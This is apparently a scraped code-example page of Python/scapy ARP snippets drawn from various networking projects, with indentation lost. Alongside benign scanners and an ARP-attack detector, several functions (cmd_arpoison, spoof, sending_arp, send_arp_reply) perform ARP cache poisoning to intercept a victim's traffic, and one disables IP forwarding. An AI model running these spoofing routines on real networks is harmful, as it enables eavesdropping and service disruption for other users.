def send_arp_reply(request):
if request.haslayer(ARP):
global _current_number_of_packets
global _current_network_interface
global _current_mac_address
global _arp
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((_current_network_interface, 0))
if request[ARP].op == 1:
if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[ARP].hwdst == "00:00:00:00:00:00":
print Base.c_info + "ARP request from MAC: " + request[ARP].hwsrc + " IP: " + request[ARP].pdst
reply = _arp.make_response(ethernet_src_mac=_current_mac_address,
ethernet_dst_mac=request[ARP].hwsrc,
sender_mac=_current_mac_address, sender_ip=request[ARP].pdst,
target_mac=request[ARP].hwsrc, target_ip=request[ARP].psrc)
SOCK.send(reply)
_current_number_of_packets += 1
if _current_number_of_packets >= _number_of_packets:
SOCK.close()
exit(0)
python类ARP的实例源码
network_conflict_creator.py 文件源码
项目:raw-packet
作者: Vladimir-Ivanov-Git
项目源码
文件源码
阅读 31
收藏 0
点赞 0
评论 0
def mac_getter(self, IP):
# Sending ARP for take the MAC address
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP), timeout=2, iface=self.interface, inter=0.2)
for send, receive in ans:
return receive.sprintf(r"%Ether.src%")
def ARPing(self):
victimMAC = self.mac_getter(self.victimIP)
AP_MAC = self.mac_getter(self.gatewayIP)
# Creating and sending ARP packets for try to hide the attack
send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=AP_MAC), count=10)
send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=10)
# Disabling IP Forwarding
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
exit()
def sending_arp(self):
victim = self.mac_getter(self.victimIP)
AP_MAC = self.mac_getter(self.gatewayIP)
# Those replies places us between them (ARP Spoofing)
send(ARP(op=2, pdst=self.victimIP, psrc=self.gatewayIP, hwdst=victim))
send(ARP(op=2, pdst=self.gatewayIP, psrc=self.victimIP, hwdst=AP_MAC))
def procpkt(pkt):
now = time()
output = '{seconds}\t{ip}\t{hwaddr}\t{vendor}'
if 'ARP' in pkt:
hosts[pkt[ARP].psrc] = {}
hosts[pkt[ARP].psrc]['hwaddr'] = pkt[ARP].hwsrc
hosts[pkt[ARP].psrc]['vendor'] = mac2vendor.get_comment(pkt[ARP].hwsrc)
hosts[pkt[ARP].psrc]['time'] = time()
click.clear()
for ip in sorted(hosts):
print(output.format(
seconds = int(now - hosts[ip]['time']),
ip = ip,
hwaddr = hosts[ip]['hwaddr'],
vendor = hosts[ip]['vendor']
))
def get_mac(iface, ip):
gw_ip = ""
gws = gateways()
for gw in gws.keys():
try:
if str(gws[gw][AF_INET][1]) == iface:
gw_ip = str(gws[gw][AF_INET][0])
except IndexError:
if str(gws[gw][0][1]) == iface:
gw_ip = str(gws[gw][0][0])
try:
alive, dead = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), iface=iface, timeout=10, verbose=0)
return str(alive[0][1].hwsrc)
except IndexError:
try:
alive, dead = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=gw_ip), iface=iface, timeout=10, verbose=0)
return str(alive[0][1].hwsrc)
except:
return "ff:ff:ff:ff:ff:ff"
except:
return "ff:ff:ff:ff:ff:ff"
def scapy_mon_arp_callback(pkt):
"""CALLBACK: Monitor ARP table on all interfaces."""
global seen_arp
if ARP in pkt and pkt[ARP].op in (1, 2):
mon_data = (pkt[ARP].hwsrc + ' ' + pkt[ARP].psrc)
arp_data = mon_data.split(' ')
if (arp_data[0]) not in seen_arp:
seen_arp[arp_data[0]] = arp_data[1]
print(bc.OKGREEN + '\tAdding: ' + arp_data[0] + ' - ' + arp_data[1])
elif (arp_data[0]) in seen_arp:
for key, value in seen_arp.items():
if key == arp_data[0] and value != arp_data[1]:
print(bc.WARN + '\tWARNING - POSSIBLE ARP-ATTACK!')
print(bc.WARN + '\tDuplicated mac address found: ' + key + ' != ' + value)
print('')
print('\tThe ARP data will be deleted within 10 seconds. If this warning persists, you are under attack!')
sleep(10)
seen_arp = {}
def restore(self, index):
try:
victimIP = self._devices[index][0]
victimMAC = self._devices[index][1]
_LOGGER.info("Enabling internet for device IP: %s MAC: %s",
victimIP, victimMAC)
del self._devices[index]
send(ARP(op=2, pdst=victimIP, hwdst=victimMAC, psrc=self._router_ip,
hwsrc=self._router_mac), count=4, iface=self._interface, verbose=False)
send(ARP(op=2, pdst=self._router_ip, hwdst=self._router_mac, psrc=victimIP,
hwsrc=victimMAC), count=4, iface=self._interface, verbose=False)
except:
_LOGGER.error("Error when restoring IP: %s", victimIP)
def get_arp_op(self, buff):
ether_packet = scapy.Ether(buff)
arp_packet = ether_packet[scapy.ARP]
return constants.ARP_OP_TYPE[arp_packet.op]
def cmd_arpsniff(iface):
""" ARP Sniffer """
conf.verb = False
if iface:
conf.iface = iface
sniff(filter="arp", store=False, prn=procpkt)
def cmd_arpoison(t1, t2, iface, verbose):
"""ARP cache poison"""
conf.verb = False
if iface:
conf.iface = iface
mac1 = getmacbyip(t1)
mac2 = getmacbyip(t2)
pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1)
pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def make_arp_reply_packet():
return (Ether(src=sender_mac_address, dst=args.target_mac) /
ARP(hwsrc=sender_mac_address, psrc=args.sender_ip,
hwdst=args.target_mac, pdst=args.target_ip))
def scapy_mon_arp():
"""Monitor ARP table on all interfaces."""
mon_data = sniff(prn=scapy_mon_arp_callback, filter="arp", store=0)
return mon_data
def ping_host(self, ip):
"""method to send ICMP/ARP requests and receive response
from the host with @ip address.
Returns a tuple (ip/host name, ONLINE/OFFLINE, response time)"""
# form an ICMP or ARP packet
packet = self.__gen_packet(ip)
try:
# send and wait for response
answers, unanswers = self.__send_recv(packet)
except PermissionError:
raise PermissionException
if self.__resolve_names:
# resolve host name by ip if resolve_names
# flag was set
try:
host = gethostbyaddr(ip)[HOST_NAME_INDEX]
except herror:
host = ip
else:
# otherwise show ip
host = ip
if answers:
answer = answers[FIRST_INDEX]
# get the request object
req = answer[REQUEST_INDEX]
# get the response object
resp = answer[RESPONSE_INDEX]
# calculate response time and round it
delta = resp.time - req.sent_time
return host, ONLINE, delta
else:
# return unansered results
unanswer = unanswers[FIRST_INDEX]
resp = unanswer[RESPONSE_INDEX]
return host, OFFLINE, None
def is_device_connected(mac_addr):
answer, _ = scapy.srp(scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=SUBNET), timeout=2)
return mac_addr in (rcv.src for _, rcv in answer)
def arping(mac, ip, timeout):
"""Arping function takes IP Address or Network, returns nested mac/ip list"""
for i in range(timeout/2):
ans = srp1(Ether(dst=mac)/ARP(pdst=ip), timeout=2, verbose=0)
if ans: break
return ans
def update_cache(self):
try:
ans, unans = arping(self._router_ip + "/24",
iface=self._interface, verbose=False)
self._arp_cache = []
if ans:
for s, r in ans:
self._arp_cache.append([r[ARP].psrc, r[Ether].src.lower()])
_LOGGER.debug("ARP cache: %s", self._arp_cache)
except Exception as e:
_LOGGER.error("Error when trying update ARP cache: %s", str(e))
def spoof(self, index):
try:
victimIP = self._devices[index][0]
victimMAC = self._devices[index][1]
send(ARP(op=2, pdst=victimIP, psrc=self._router_ip,
hwdst=victimMAC), iface=self._interface, verbose=False)
send(ARP(op=2, pdst=self._router_ip, psrc=victimIP,
hwdst=self._router_mac), iface=self._interface, verbose=False)
except:
_LOGGER.error("Error when trying to spoof device IP: %s MAC: %s",
victimIP, victimMAC)
def cmd_arping(ip, iface, verbose):
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
conf.iface = iface
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)
res.show()